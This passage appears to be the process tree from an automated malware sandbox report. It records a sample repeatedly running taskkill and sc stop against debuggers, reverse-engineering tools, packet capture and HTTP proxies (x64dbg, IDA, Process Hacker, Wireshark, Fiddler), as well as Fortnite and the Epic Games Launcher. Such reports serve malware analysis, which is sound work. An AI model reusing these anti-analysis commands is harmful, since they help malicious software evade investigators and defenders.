- - C:\Windows\system32\sc.exe
    sc stop wireshark
    3⤵
    PID:2032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:576
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:900
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:1204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:4740
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:4744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4436
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:2764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:2844
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    PID:1372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4480
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:2448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4060
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:1008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:2280
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:1412
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3248
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:2656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:1228
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Kills process with taskkill
    PID:2532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4008
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:1684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1168
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:1260
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Kills process with taskkill
    PID:2540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4800
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T
    3⤵
    PID:3384
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1948
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:2496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4208
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T
    3⤵
    PID:4612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:1808
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:5112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1792
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T
    3⤵
    PID:4784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:2796
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:1960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2804
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
    3⤵
    PID:564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4468
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq die*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4996
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq die*" /IM * /F /T
    3⤵
    PID:1092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4392
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:2088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:456
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:5008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:1272
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:4808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1180
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:2912
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebugger.exe >nul 2>&1
  2⤵
  PID:1212
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebugger.exe
    3⤵
    - Kills process with taskkill
    PID:540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:1668
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Kills process with taskkill
    PID:1568
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FolderChangesView.exe >nul 2>&1
  2⤵
  PID:1420
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FolderChangesView.exe
    3⤵
    PID:3948
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:756
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:3436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HttpDebuggerSdk >nul 2>&1
  2⤵
  PID:3536
- - C:\Windows\system32\sc.exe
    sc stop HttpDebuggerSdk
    3⤵
    PID:2544
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:1612
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1820
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop npf >nul 2>&1
  2⤵
  PID:236
- - C:\Windows\system32\sc.exe
    sc stop npf
    3⤵
    PID:448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:2788
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:1908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:380
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:776
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3984
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:4656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4740
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3276
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Ida64.exe
    3⤵
    PID:3808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:792
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:2236
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:1008
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    PID:3572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2280
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:2848
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
  2⤵
  PID:2696
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg64.exe
    3⤵
    PID:4076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:2736
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
  2⤵
  PID:4856
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg32.exe
    3⤵
    PID:3580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4476
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:1260
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    PID:1492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:3132
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4156
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:4324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2428
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:2500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3924
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:2224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1360
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    - Kills process with taskkill
    PID:2740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2796
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:3532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:3160
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:4468
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:4580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:2804
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:2536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:2012
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:4400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4236
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:2192
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:2688
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    PID:540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:5068
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:1280
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3192
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:1740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2904
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1776
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1668
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:1584
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4140
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:2360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1048
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:1204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4056
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1672
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T
    3⤵
    PID:4796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2456
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T
    3⤵
    PID:4712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4052
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    - Kills process with taskkill
    PID:2764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2860
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4480
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3908
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T
    3⤵
    PID:5108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1732
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:1412
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4120
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
    3⤵
    PID:4060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2848
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Kills process with taskkill
    PID:1228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3764
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
    3⤵
    PID:1148
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:3684
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:3580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4008
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq charles*" /IM * /F /T
    3⤵
    PID:3488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1580
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4844
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4332
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:1800
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:3132
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:3640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4324
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq ida*" /IM * /F /T
    3⤵
    PID:464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2320
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1060
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:2364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:3924
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:5040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3900
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:1744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2176
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:4760
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    PID:2536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1
  2⤵
  PID:3352
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerProSdk
    3⤵
    PID:4404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:456
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1
  2⤵
  PID:4996
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker3
    3⤵
    PID:4660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1
  2⤵
  PID:5100
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker2
    3⤵
    - Launches sc.exe
    PID:4380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:1312
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:2468
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1
  2⤵
  PID:1740
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker1
    3⤵
    - Launches sc.exe
    PID:5068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop wireshark >nul 2>&1
  2⤵
  PID:1264
- - C:\Windows\system32\sc.exe
    sc stop wireshark
    3⤵
    - Launches sc.exe
    PID:1144
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:3948
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:5104
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:3536
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:756
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:5096
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Kills process with taskkill
    PID:1196
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1612
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:1820
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:1672
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    PID:2824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4712
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3144
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:4052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1824
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:2860
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1368
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:1472
- C:\Windows\system32\cmd.exe
